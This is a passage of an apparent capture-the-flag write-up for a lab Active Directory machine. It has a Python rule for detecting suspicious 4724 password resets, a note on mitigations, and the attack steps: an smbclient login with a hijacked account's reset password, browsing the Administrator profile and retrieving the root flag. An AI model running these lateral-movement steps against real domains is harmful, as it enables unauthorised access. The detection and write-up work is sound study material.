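# Hypothetical watchlist of accounts whose password resets always warrant a ticket.
PRIVILEGED_ACCOUNTS = {"administrator", "tristan.davies"}


def is_service_account(name: str) -> bool:
    # Computer accounts and (group) managed service accounts end in '$'.
    return name.endswith("$")


def classify_password_reset(event: Dict[str, object]) -> List[str]:
    """Return the reasons (possibly none) why a 4724 event should be alerted on."""
    if event.get("EventID") != 4724:
        return []
    subject = str(event["SubjectUserName"])
    target = str(event["TargetUserName"])
    reasons: List[str] = []
    # A gMSA exists to run a service; it has no business resetting a user's password.
    if is_service_account(subject) and not is_service_account(target):
        reasons.append("service-account-reset-user-password")
    if target.lower() in PRIVILEGED_ACCOUNTS:
        reasons.append("privileged-target")
    return reasons


def alerts(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Collect every 4724 that trips at least one rule, with its reasons."""
    out: List[Dict[str, object]] = []
    for ev in events:
        reasons = classify_password_reset(ev)
        if reasons:
            out.append({"host": ev["Computer"], "subject": ev["SubjectUserName"],
                        "target": ev["TargetUserName"], "reasons": reasons})
    return out


if __name__ == "__main__":
    for alert in alerts(SAMPLE_EVENTS):
        print(alert)
```

The rule is deliberately narrow so it stays quiet on routine helpdesk resets; the structural fix for the path used here is to remove GenericAll over privileged users from service accounts and to restrict who may read the gMSA password in the first place.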

Lateral Movement

Having changed the password of Tristan.Davies, we can now access the account without issue.

Accessing the system through SMB:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/C$ -U 'SEARCH/Tristan.Davies%test1234'
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\search.htb\C$\
smb: \> cd Users\Administrator\
smb: \Users\Administrator\> ls
  .                                  Dc        0  Mon Dec 20 03:34:49 2021
  ..                                 Dc        0  Mon Dec 20 03:34:49 2021
  3D Objects                        DRc        0  Mon Nov 22 15:21:49 2021
  AppData                           DHc        0  Mon Mar 23 03:07:10 2020
  Application Data                DHSrn        0  Mon Mar 23 03:07:10 2020
  Contacts                          DRc        0  Mon Nov 22 15:21:49 2021
  Cookies                         DHSrn        0  Mon Mar 23 03:07:10 2020
  Desktop                           DRc        0  Mon Nov 22 15:21:49 2021
  Documents                         DRc        0  Mon Nov 22 15:21:50 2021
  Downloads                         DRc        0  Mon Nov 22 15:21:49 2021
  Favorites                         DRc        0  Mon Nov 22 15:21:49 2021
  Links                             DRc        0  Mon Nov 22 15:21:50 2021
  Local Settings                  DHSrn        0  Mon Mar 23 03:07:10 2020
  Music                             DRc        0  Mon Nov 22 15:21:49 2021
  My Documents                    DHSrn        0  Mon Mar 23 03:07:10 2020
  NetHood                         DHSrn        0  Mon Mar 23 03:07:10 2020
  NTUSER.DAT                        AHn   262144  Sat Apr 23 00:56:33 2022
  ntuser.dat.LOG1                   AHS     8192  Mon Mar 23 03:07:10 2020
  ntuser.dat.LOG2                   AHS    40960  Mon Mar 23 03:07:10 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TM.blf    AHS    65536  Mon Mar 23 03:07:11 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Mar 23 03:07:10 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Mar 23 03:07:10 2020
  ntuser.ini                        HSc       20  Mon Mar 23 03:07:10 2020
  ntuser.pol                      AHSRc      480  Thu Jul 30 09:21:24 2020
  Pictures                          DRc        0  Mon Nov 22 15:21:49 2021
  Recent                          DHSrn        0  Mon Mar 23 03:07:10 2020
  Saved Games                       DRc        0  Mon Nov 22 15:21:50 2021
  Searches                          DRc        0  Mon Nov 22 15:21:49 2021
  SendTo                          DHSrn        0  Mon Mar 23 03:07:10 2020
  Start Menu                      DHSrn        0  Mon Mar 23 03:07:10 2020
  Templates                       DHSrn        0  Mon Mar 23 03:07:10 2020
  Videos                            DRc        0  Mon Nov 22 15:21:49 2021

		3246079 blocks of size 4096. 409296 blocks available
smb: \Users\Administrator\> ls Desktop\
  .                                 DRc        0  Mon Nov 22 15:21:49 2021
  ..                                DRc        0  Mon Nov 22 15:21:49 2021
  desktop.ini                       AHS      282  Mon Nov 22 15:21:49 2021
  root.txt                          ARc       34  Fri Apr 22 09:32:25 2022

		3246079 blocks of size 4096. 411142 blocks available
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> get root.txt 
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> quit
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat root.txt 
77dd4b********************8a5483

AND we got the root flag!!

Going back to the certificate files: once we have the passphrase and inspect them, we see that one is a user certificate and the other the CA certificate file (both PKCS#12). With both imported into the browser, we can try to access the site the user certificate is meant for:

http://research.search.htb/staff

References

Kerberoasting
Group Managed Service Account
Hunt for the gMSA secrets